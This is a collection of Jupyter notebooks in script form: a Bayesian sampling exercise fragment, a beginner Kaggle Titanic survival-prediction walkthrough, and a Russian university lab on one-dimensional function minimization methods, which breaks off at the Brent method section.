# where $\mathrm{InvGamma}(\alpha, \beta)$ denotes the inverse-gamma distribution. For standardised data, we can use the hyperparameters $\mu_0 = 0, \sigma_0^2 = 10^2, \alpha = \beta = 2$.
#
# Hints:
# * In order to apply HMC / NUTS you need to transform $\sigma^2$ to an unbounded space with $\log$-transformation as before.
# * In order to play safe with autograd, you may want to implement the required probability densities yourself rather than using scipy.
# * NUTS can sometimes drive some of the parameters to quite extreme values. You should make sure that your target function evaluation is numerically stable, i.e. make sure you will not evaluate exp() for too large numbers etc.
# +
# %matplotlib inline
import autograd.numpy as np
import autograd.numpy.random as npr
import pandas as pd
import autograd.scipy.special as scs
import matplotlib.pyplot as plt
data = pd.read_csv('http://www.helsinki.fi/~ahonkela/teaching/compstats1/toydata2.txt', sep='\t', header=None)
data = data.values
data = np.array(data[:,0])
| 6,402 |
/Notebooks/py/rounak15/titanic-survival-prediction-with-python/titanic-survival-prediction-with-python.ipynb
|
2ecda5cbed2149ea6f46bc11e1658829f7c7179c
|
[] |
no_license
|
nischalshrestha/automatic_wat_discovery
|
https://github.com/nischalshrestha/automatic_wat_discovery
| 2 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 29,461 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] _uuid="da3173fee2fb9aad4bc433d025f790dacfcb72f2"
# **Titanic Survival Predictions**
#
# I am new to data science and machine learning and this is my first attempt at Kaggle where I will be trying to predict the possibility of a passenger surviving on the Titanic using the *Titanic: Machine Learning from Disaster dataset*
#
# We will tackle this problem with the following steps
# 1. Importing the packages and libraries.
# 2. Reading and Exploring the Data.
# 3. Data Analysis.
# 4. Visual Data Analysis.
# 5. Cleaning the Data
# 6. Feature Engineering
# 7. Machine learning
# 8. Submitting our predictions
#
# I would love to see your feedback in the comments section!
# + [markdown] _uuid="54cbe4e8340bc21d0f95490dd107c6f41ca23142"
# **1) Importing the packages and libraries**
#
# let's start off by importing the necessary libraries for data analysis and visualisation
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
#lets load the required packages and libraries for data analysis
import numpy as np
import pandas as pd
import re
import warnings
warnings.filterwarnings('ignore')
#For data visualization
import seaborn as sns
import matplotlib.pyplot as plt
# %matplotlib inline
# + [markdown] _uuid="8ed4b6d08e94b2177f2a67d979553e2e4606265f"
# **2) Reading and exploring the data**
#
# let's read the training and testing datasets from the provided CSV files and use the ***.head()*** and ***.info()*** methods to take a glimpse at our data
# + _uuid="cdf53ad9e2624113f2dd673753ff6297167ba9c4"
#importing the training and test datasets
train_df = pd.read_csv('../input/train.csv')
test_df = pd.read_csv('../input/test.csv')
# + _uuid="1acdc6cb9f6a23616c3009a3115aa3b4fc5a6eed"
#lets take a look at our training data
train_df.head()
# + _uuid="e6e415fddaeb1c501aeab5b16162101b102a8d4f"
# Now the test dataset
test_df.head()
# + [markdown] _uuid="c7af16a1f99e22a807f2d7b34171e35e9c57a09a"
# The Survived column is missing here because that is what we are supposed to predict with our model.
# + _uuid="cf3bf44516383a939e446b4098e5c46359653f1b"
# lets see what kind of data we have to work with
train_df.info()
# + [markdown] _uuid="fef1e37e8f9631f351f5101e9390d7babd445ce0"
# From above, we can see that we have 891 rows or samples and 12 columns of types *int64* , *object* and *float64 *to work with
# + [markdown] _uuid="7fc9c5656857fc796ef20452e1c56f4f23abb2e9"
# **3) Data analysis :**
#
# Now let's see what features we have to train our model on and what useful insights we can obtain from them.
#
# + _uuid="adc7cc2fa38e4f38f4663f87e96c9f45b4b21aa6"
#printing out a list of all the columns in our training dataset
train_df.columns
# + [markdown] _uuid="bcd6efc56fec1b8b8ccb0d75f7608eea8fe9c839"
# ** Types of features : **
#
# * Categorical : Pclass, Sex, Embarked, Survived
# * Continuous : Age, Fare, Sibsp, Parch, PassengerId
# * Alphanumeric: Ticket, Cabin, Name
# + [markdown] _uuid="5c2cf46ed184e084f5a15e6af4d14428c2f2d219"
#
# + [markdown] _uuid="f8a2539bf26ee76950d06ceeaafb2298d156fc7b"
# Now that we know what kind of features we are going to work with, let's take a look what information they provide us:
# + _uuid="90e1c50f7bf034cf26a90bc3fae147dfe78c7d81"
#printing summary statistics
train_df.describe()
# + [markdown] _uuid="6085e6151b756b6d9f424c5e0d43a147f0107722"
# ** Observations from above summary statistics: **
# * There are a total of 891 passengers in our training dataset.
# * Since the Survived column has dicrete data, the mean gives us the number of people survived from 891 i.e. 38%.
# * Most people belonged to Pclass = 3
# * The maximum Fare paid for a ticket was 512 however the fare prices varied a lot as we can see from the standard deviation of 49
# + _uuid="d0927c2f9cdf316865c9ea8ce5f28727788dace4"
train_df.describe(include='O')
# + [markdown] _uuid="66ed8953b49ceeb40f0be66a1e433ea12cdcc4cd"
# Taking a look at our categorical features we find that:
# * The passneger column has two sexes with male being the most common.
# * Cabin feature has many duplicate values.
# * Embarked has three possible values with most passengers embarking from Southhampton.
# * Names of all passengers are unique.
# * Ticket column also has a fair amount of duplicate values.
#
# + _uuid="b4c8c281824d05296f260f82ee29ee85c2a1243b"
#Finding the percantage of missing values in train dataset
train_df.isnull().sum()/ len(train_df) *100
# + _uuid="f585235336b82b08c8e87d78ee3607d9e7818e7d"
#Finding the percentage of Null values in test dataset
test_df.isnull().sum()/ len(test_df) *100
# + [markdown] _uuid="aaad212cbeccd6805890e296125cbf9b166432a6"
# As we can see the Age column and Embarked column are missing values that we will need to fill.
# The Cabin coulmn has 77% and 78% missing values in train and test datasets respectively hence, it might be worth considering dropping that feature.
# + [markdown] _uuid="42d1056ca02efdb0330a9cb51e3ad8c9401e9ff3"
# ** 4) Visual Data Analysis**
#
# It's time to visualize our data and try to draw some inferences from it
# + [markdown] _uuid="087e6f019ec62b6fb3cd3086e97b4b614bc92084"
# ** Sex feature**
#
# let's begin by exploring the Sex column in our trainig data set
# + _uuid="1faf4cf53a3b03056a61b0511958751952e46a42"
sns.countplot('Sex',data=train_df)
train_df['Sex'].value_counts()
# + [markdown] _uuid="45fea51e2b6f2abb4d458d9b5989f975139b009e"
# The number of males on board were clearly more than the female. Now let's see how their survival percentages were:
# + _uuid="95f40aefaa6b3b35cea9cbd7e1f2a6a20a72ed40"
#Comparing the Sex feature against Survived
sns.barplot(x='Sex',y='Survived',data=train_df)
train_df.groupby('Sex',as_index=False).Survived.mean()
# + [markdown] _uuid="6c4d23983a418fbcd57dae3663bacddf378ba7ac"
# As one would assume the number of female who survived was much more than the males who survived i.e. 74% females as against to 18% males
# + [markdown] _uuid="99ad9863e0192d39e6b25df8793db533acdbb36c"
# How did the Class of each passenger affect their survival?
# + _uuid="ce060b776c9ec19cb3cdc70fb8941d420e271fad"
#Comparing the Pclass feature against Survived
sns.barplot(x='Pclass',y='Survived',data=train_df)
train_df[["Pclass", "Survived"]].groupby(['Pclass'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="e5c570ef01a65cc54327d3bdead82025c9d6c799"
# Clearly Class had an effect on survival of each passenger with the percentages of survival being 62.96%, 47.28%, 24.23% for Pclass 1, 2 and 3 respectively.
# Thus, belonging to Pclass = 1 had a huge advantage.
# + [markdown] _uuid="e1c18b20aac0cbf4b5b84d8f3ad24ea471b024ef"
# Did the port from which the passengers embarked have an effect on their Survival?
# + _uuid="35f3753d11d58c24aa4d6cd6e68bfd22eb1b5ee6"
#Comparing the Embarked feature against Survived
sns.barplot(x='Embarked',y='Survived',data=train_df)
train_df[["Embarked", "Survived"]].groupby(['Embarked'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="ba40ed2c06a15ef5a1b00d3349aa770984ae9d10"
# It seems that the passengers that embarked from port Cherbourg had a higher rate of Survival at 55%. This could be either due to their Sex or socio-economic class.
# Let's move forward to see the effect of having parents or children on-board.
# + _uuid="a6c2ca8ff240f890db44c5e087bff4a3ebb8c330"
sns.barplot(x='Parch',y='Survived',data=train_df)
train_df[["Parch", "Survived"]].groupby(['Parch'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="de27505dc010bfc15b70d12b9a26ab47fee17f44"
# Looks like passengers who had either 1, 2 or 3 had a higher possibility of surviving than the ones had none. However having more than 3 made the possibility even lesser.
# Moving on to the effect of having spouse or siblings on Survival:
# + _uuid="16a3b4f8a607be8282e268e461bd5c9463c41614"
sns.barplot(x='SibSp',y='Survived',data=train_df)
train_df[["SibSp", "Survived"]].groupby(['SibSp'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="2a22ca09e29c90a13292a7d533bed22edf5e859a"
# It seems that having a spouse or 1 sibling had a positive effect on Survival as compared to being alone. Though the chances of survival go down with the number of siblings after 1.
# + [markdown] _uuid="93adc95dd7a17918a5cb7fc0b93ea74af90df89a"
# The Age column has some missing values. We will take care of that later when we clean our training data.
# First we shall proceed by:
# 1. Plotting a histogram of the age values .
# 2. Taking a look at the median value of age as well as the spread.
# + _uuid="c416c66beb6b8e5e5e9f587a176e6ff2ac3f6edf"
train_df.Age.hist(bins=10,color='teal')
plt.xlabel('Age')
plt.ylabel('Count')
plt.show()
print("The Median age of passengers is :", int(train_df.Age.median()))
print("The Standard Deviation age of passengers is :", int(train_df.Age.std()))
# + [markdown] _uuid="27604041fa28d21fceeb490b7cc80d6c03ea9ff3"
# It is obvious to assume that younger individuals were more likely to survive, however we should test our assumption before we proceed.
# + _uuid="f6c4b31271a89710d3664e98c9f84f82689ab90d"
sns.lmplot(x='Age',y='Survived',data=train_df,palette='Set1')
# + [markdown] _uuid="f045da56e8a919c4cc0c744f9739b855908e28f9"
# Our assumption was right, younger individuals were more likely to survive.
# + [markdown] _uuid="f8eba080fd5f78944007e0b85def210b8ae62352"
# From the sex column we saw that there was a significant difference in the percentage of men and women that survived.
# Does sex also play a role when it comes to surviving the disaster along with the age?
# + _uuid="576e947ba72210f71781348a564e4ca235993f4e"
sns.lmplot(x='Age',y='Survived',data=train_df,hue='Sex',palette='Set1')
# + [markdown] _uuid="10948d548a00b5e70b26c35f93e10ead918b5171"
# Interestingly, age has an opposite effect on the survival in men and women. The chances of survival increase as the age of women increases.
#
# Takeaway: Age feature can have a different effect on the outcome depending on the sex of the passenger. Perhaps we can use this information in feature engineering
# + _uuid="2dab99a02f74d4a3ff470f64f704f85aecafcd40"
#Checking for outliers in Age data
sns.boxplot(x='Sex',y='Age',data=train_df)
#getting the median age according to Sex
train_df.groupby('Sex',as_index=False)['Age'].median()
# + _uuid="8a51ac77d187c95488572eb8bbac63a9f87f72ba"
#plotting the Fare column to see the spread of data
sns.boxplot("Fare",data=train_df)
#Checking the mean and median values
print("Mean value of Fare is :",train_df.Fare.mean())
print("Median value of Fare is :",train_df.Fare.median())
# + [markdown] _uuid="ff7fce6bc46360a5ac005d7959b5b4060b44988e"
# ** 5)Cleaning Data ***
#
# Now that we have visualized our data , we can proceed to fill in the NaN values in our test and train datasets and drop the columns that we will not require
# + _uuid="2bb0295ff0388c959e9d8acabf334dcc934ee9e6"
#let's start off by dropping the coulmns we will not be needing
drop_list=['Cabin','Ticket','PassengerId']
train_df = train_df.drop(drop_list,axis=1)
test_passenger_df = pd.DataFrame(test_df.PassengerId)
test_df = test_df.drop(drop_list,axis=1)
test_passenger_df.head()
# + [markdown] _uuid="a0e7b9ec7a4d828b4aec79be79a7acc039190adc"
# Now, let's fill in the missing values for Embarked column in the training dataset. Most people embarked on their journey from Southhampton port. Hence, we will be filling the two missing values with "S"
# + _uuid="6dc50aac4030b5abe4c44c90643647ec4190bed5"
#filling the missing Embarked values in train and test datasets
train_df.Embarked.fillna('S',inplace=True)
# + [markdown] _uuid="d7ddccf978f3db5a66e821388ffb087b447de7d4"
# We will replace the NaN values in the age column with the median age
# + _uuid="faa342aaaa6d2f11ae263c550452e641d843cf93"
#filling the missing values in the Age column
train_df.Age.fillna(28, inplace=True)
test_df.Age.fillna(28, inplace=True)
# + [markdown] _uuid="19a2176e450a8a62e0c1238e03c07eea83b0e2d2"
# There is a small fraction of fare values missing in the fare column which we will fill using the median value since there a plenty of outliers in the data.
# + _uuid="79990f4df37e08d1e098ef100039d6798d713cdd"
#Filling the null Fare values in test dataset
test_df.Fare.fillna(test_df.Fare.median(), inplace=True)
# + [markdown] _uuid="144574ede336ae474b708052f6562f9d101e9e07"
# **6) Feature Engineering**
# + [markdown] _uuid="dc8946017870f7835f678331853ae0243cccf4d8"
# *Title Feature*
# The name column might not be useful to us directly but a lot of names have titles like Mr, Mrs, Lady, etc which might indicate the individual's status in the society which can affect the chance of survival.
#
# We shall try to extract a *Title* feature form the name column which might improve the performanc of our model.
# + _uuid="a7444c8ba9326f32e1834194a2eb8bfc15b469e3"
#combining train and test dataframes to work with them simultaneously
Combined_data = [train_df, test_df]
# + _uuid="a50bc02596f2835f51c893e6f0998210beaf20a4"
#extracting the various title in Names column
for dataset in Combined_data:
dataset['Title'] = dataset.Name.str.extract(' ([A-Za-z]+)\.', expand=False)
#Plotting the various titles extracted from the names
sns.countplot(y='Title',data=train_df)
# + [markdown] _uuid="c67c5125b779780a2ffaecef151decd0657a93ab"
# There are some titles that are very rare like Capt and Lady. It would be better to group such titles under one name know as 'rare'.
# Some titles also seem to be incorrectly spelled. They also need to be rectified.
# + _uuid="5f6b73547cc98beb4ac124e3917a3e934a4e0d6d"
#Refining the title feature by merging some titles
for dataset in Combined_data:
dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col',\
'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Special')
dataset['Title'] = dataset['Title'].replace({'Mlle':'Miss','Ms':'Miss','Mme':'Mrs'})
train_df.groupby('Title',as_index=False)['Survived'].mean().sort_values(by='Survived',ascending=False)
# + _uuid="7c88ab6acb9f99174f493273d0a70c512d65c0aa"
#Now lets see the distribution of the title feature
sns.countplot(y='Title',data=train_df)
# + _uuid="fed54564cffc62dc074787018297a1e439cab100"
#Mapping the title names to numeric values
title_mapping = {"Mr": 1, "Miss": 2, "Mrs": 3, "Master": 4, "Special": 5}
for dataset in Combined_data:
dataset['Title'] = dataset.Title.map(title_mapping)
dataset['Title'] = dataset.Title.fillna(0)
# + [markdown] _uuid="64d1983bade22173e529ff6f4b6d282fbd1f0b4b"
# As we observed from our data visualization being alone on the titanic had a disadvantage when it came to survival:
# Next we will create a feature IsAlone which depends on the number of family members that can be calculated from the Parch and SibSp columns
# + _uuid="7ce6b12d940fe9be965b70feed008c8ac2676dfd"
#Creating a new feature IsAlone from the SibSp and Parch columns
for dataset in Combined_data:
dataset["Family"] = dataset['SibSp'] + dataset['Parch']
dataset["IsAlone"] = np.where(dataset["Family"] > 0, 0,1)
dataset.drop('Family',axis=1,inplace=True)
train_df.head()
# + [markdown] _uuid="0cfbc0e97e8b67affb60bbe8c9edf01fb3a3c0cb"
# Getting rid of the columns that are not required anymore:
# + _uuid="6f954f15f3d7305a68820511912f53c9f229c9ab"
#dropping the Name,SibSP and Parch columns
for dataset in Combined_data:
dataset.drop(['SibSp','Parch','Name'],axis=1,inplace=True)
# + [markdown] _uuid="e96caee826dbef0b2155462583a1fac2696f6cf2"
# Age had big role to play when it came to survival. Clearly younger people were more likely to survive.
# Hence, it should be worth considering a feature IsMinor for the passengers under the age of 15.
# + _uuid="7b865b112b837b5a3347461a4a78af074c88f5d7"
#Creating another feature if the passenger is a child
for dataset in Combined_data:
dataset["IsMinor"] = np.where(dataset["Age"] < 15, 1, 0)
# + [markdown] _uuid="e8ad94332647b489198bec0249e9cce3f3851268"
# Older female passengers also had a higher chance of survival. Let's create a feature name Old_female that would account for women older tha 50 years on board
# + _uuid="e93bcc0fab6827b99b13bbcfcf2f079ca494b640"
train_df['Old_Female'] = (train_df['Age']>50)&(train_df['Sex']=='female')
train_df['Old_Female'] = train_df['Old_Female'].astype(int)
test_df['Old_Female'] = (test_df['Age']>50)&(test_df['Sex']=='female')
test_df['Old_Female'] = test_df['Old_Female'].astype(int)
# + [markdown] _uuid="6c10680f0d2843b13ea49a4836e3c342d9b012eb"
# Pclass, Sex and Embarked are the categorical features in our data. we can convert these categorucal variables into dummy variables using the *get_dummies* method in python
# + _uuid="d08ee65977405cb89d4cde56dd887ee67f0679d6"
#Converting categorical variables into numerical ones
train_df2 = pd.get_dummies(train_df,columns=['Pclass','Sex','Embarked'],drop_first=True)
test_df2 = pd.get_dummies(test_df,columns=['Pclass','Sex','Embarked'],drop_first=True)
train_df2.head()
# + [markdown] _uuid="af9bc6c7e0b145a80e6dfa713677db45a8240979"
# Age and Fare columns have continuous data and there might be fluctuations that do not reflect patterns in the data, which might be noise. That's why wel put people that are within a certain range of age or fare in the same bin. This can be achieved using *qcut* method in *pandas*
# + _uuid="e3c1675ab1b6293e5caf3e3f5813727eea8e0832"
#creating Age bands
train_df2['AgeBands'] = pd.qcut(train_df2.Age,4,labels=False)
test_df2['AgeBands'] = pd.qcut(test_df2.Age,4,labels=False)
# + _uuid="af68cdedb7e7b1959d88fac999536b42aa8be1d7"
#creating Fare bands
train_df2['FareBand'] = pd.qcut(train_df2.Fare,7,labels=False)
test_df2['FareBand'] = pd.qcut(test_df2.Fare,7,labels=False)
# + _uuid="afdb50313a6382ce22541292d77fdf81210fb866"
#Dropping the Age and Fare columns
train_df2.drop(['Age','Fare'],axis=1,inplace=True)
test_df2.drop(['Age','Fare'],axis=1,inplace=True)
# + [markdown] _uuid="182e5e6e936d18dbc08a8ee3c66b55c465060170"
# Let's take a final look at our training and testing data before we proceed to build our model.
# + _uuid="297a5a9578f8975dfddc73210f7f9d864ee170c1"
train_df2.head()
#sns.barplot('AgeBands','Survived',data=train_df2)
# + _uuid="2245e77e8bca32c98996abd9c1e51a61673a34de"
test_df2.head()
# + [markdown] _uuid="550343a009b9b2cea8cb16aff2c853ffd5114999"
# **7) Machine Learning**
#
# We will try out some different ML models to see which gives us the best result.
# the process will be as follows:
# * Importing the required machine learning libraries from scikit learn.
# * Splitting out training data into train and test datasets to check the performance of our model.
# * Try out different classifying model to see which fits the best.
# + _uuid="6ce4e5da8b9eed96c3fc1f464ddcac1fbd30555f"
#importing the required ML libraries
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV
from sklearn.metrics import accuracy_score
# + _uuid="f1e45a14064d3904a04a70d8ea4295fabfa7dde8"
#Splitting out training data into X: features and y: target
X = train_df2.drop("Survived",axis=1)
y = train_df2["Survived"]
#splitting our training data again in train and test data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,random_state=42)
# + _uuid="647fec750a5707859d1cbab9184cd2da1d7fd3e4"
#Logistic Regression
logreg = LogisticRegression()
logreg.fit(X_train,y_train)
y_pred = logreg.predict(X_test)
acc_logreg = round(accuracy_score(y_pred, y_test) * 100, 2)
acc_logreg
# + [markdown] _uuid="3672cda23095026665476b748b7867ff8369d6fa"
# Our score also depends on how we had split our training data using *train_test_split*. We should also perform k-fold cross validation to get a more accurate score. Here we will be going with 5 folds.
# + _uuid="0ba802b05ebf0c86b9a56e44390e2d30b0803602"
#let's perform some K-fold cross validation for logistic Regression
cv_scores = cross_val_score(logreg,X,y,cv=5)
np.mean(cv_scores)*100
# + _uuid="7dd5e3d8b9294d7c5cd6ae9df62dbc704a1b26ee"
#Decision Tree Classifier
decisiontree = DecisionTreeClassifier()
dep = np.arange(1,10)
param_grid = {'max_depth' : dep}
clf_cv = GridSearchCV(decisiontree, param_grid=param_grid, cv=5)
clf_cv.fit(X, y)
clf_cv.best_params_,clf_cv.best_score_*100
print('Best value of max_depth:',clf_cv.best_params_)
print('Best score:',clf_cv.best_score_*100)
# + _uuid="e8f651e0eece9cba1642df1ea368d3aaa947e085"
#Random Forest CLassifier
random_forest = RandomForestClassifier()
ne = np.arange(1,20)
param_grid = {'n_estimators' : ne}
rf_cv = GridSearchCV(random_forest, param_grid=param_grid, cv=5)
rf_cv.fit(X, y)
print('Best value of n_estimators:',rf_cv.best_params_)
print('Best score:',rf_cv.best_score_*100)
# + _uuid="1c6bc7ef7c4a5b83247ea570e1d01d8dda0613af"
gbk = GradientBoostingClassifier()
ne = np.arange(1,20)
dep = np.arange(1,10)
param_grid = {'n_estimators' : ne,'max_depth' : dep}
gbk_cv = GridSearchCV(gbk, param_grid=param_grid, cv=5)
gbk_cv.fit(X, y)
print('Best value of parameters:',gbk_cv.best_params_)
print('Best score:',gbk_cv.best_score_*100)
# + [markdown] _uuid="2af1765ceafc960ae35e9bd2ef6725975b5ece19"
# **7) Submission.**
# Finally, we are ready to submit our solution to see where we rank. To do so we need to make a submission.csv file that contains only the PassengerId and our predictions for those ID's.
# + _uuid="dff1bc19b95dae6e7e69524e63dfde743ed688f9"
y_final = clf_cv.predict(test_df2)
submission = pd.DataFrame({
"PassengerId": test_passenger_df["PassengerId"],
"Survived": y_final
})
submission.head()
submission.to_csv('titanic.csv', index=False)
# + [markdown] _uuid="776ca155ff3e4a3092b33e8129ee075d1a28c4ab"
# I hope this notebook helped you out and please free to give any feedback or advice in the comments. I am new and this would help me out a lot!
#
# **Sources:**
# * [Titanic Data Science Solutions](https://www.kaggle.com/startupsci/titanic-data-science-solutions)
# * [Titanic Survival Predictions (Beginner)](https://www.kaggle.com/nadintamer/titanic-survival-predictions-beginner/notebook)
# * [Machine Learning with Kaggle: Feature Engineering](https://www.datacamp.com/community/tutorials/feature-engineering-kaggle)
| 22,933 |
/lab1/1d-unimode-minimization.ipynb
|
22572392cf32f19a8a5ee7f1b1e5a46d4c76c868
|
[] |
no_license
|
sevakon/optimization-methods
|
https://github.com/sevakon/optimization-methods
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,010,221 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Методы оптимизации
# ## Лабораторная работа #1
#
# ### Одномерная минимизация функции без производной
# ### Выполнили: Козар Илья, Коняхин Всеволод, M33051
# +
import pandas as pd
import numpy as np
import math
import matplotlib.pyplot as plt
# %matplotlib inline
# -
from methods import minimize_1d, plot_log_e_to_num_iters
# +
# define functions
def f1(x):
return -5 * x ** 5 + 4 * x ** 4 - 12 * x ** 3 + 11 * x ** 2 - 2 * x + 1 # [-0.5;0.5]
def f2(x):
return math.log(x - 2, 10) ** 2 + math.log(10 - x, 10) ** 2 - x ** 0.2 # [6;9.9]
def f3(x):
return -3 * x * math.sin(0.75 * x) + math.exp(-2 * x) # [0;2pi]
def f4(x):
return math.exp(3 * x) + 5 * math.exp(-2 * x) # [0;1]
def f5(x):
return 0.2 * x * math.log(x, 10) + (x - 2.3) ** 2 # [0.5;2.5]
# -
# define functions
functions = [
dict(fn=f1, a=-0.5, b=0.5, title="$f_1 = -5 x^5 + 4 x^4 - 12 x^3 + 11 x^2 - 2x + 1 $"),
dict(fn=f2, a=6, b=9.9, title="$f_2 = \lg^2{(x-2)} + \lg^2{(10-x)} - x^{0.2}$"),
dict(fn=f3, a=0, b=2 * math.pi, title="$f_3 = -3x \sin{(0.75 x)} + \exp{-2x}$"),
dict(fn=f4, a=0, b=1, title="$f_4 = \exp{3x} + 5 \exp{-2x}$"),
dict(fn=f5, a=0.5, b=2.5, title="$f_5 = 0.2 x \lg{x} + (x - 2.3)^2$"),
]
# ### Визуализация исходных функций
for d in functions:
x = np.linspace(d["a"], d["b"], 40)
y = list(map(d["fn"], x))
plt.plot(x, y)
plt.title(d["title"])
plt.xlabel("X")
plt.ylabel("Y")
plt.show()
# ### Метод Дихотомии
fn, method_name = functions[0], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Метод золотого сечения
fn, method_name = functions[0], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Метод Фиббоначи
fn, method_name = functions[0], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Метод парабол
fn, method_name = functions[0], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Комбинированный метод Брента
fn, method_name = functions[0], "brent"
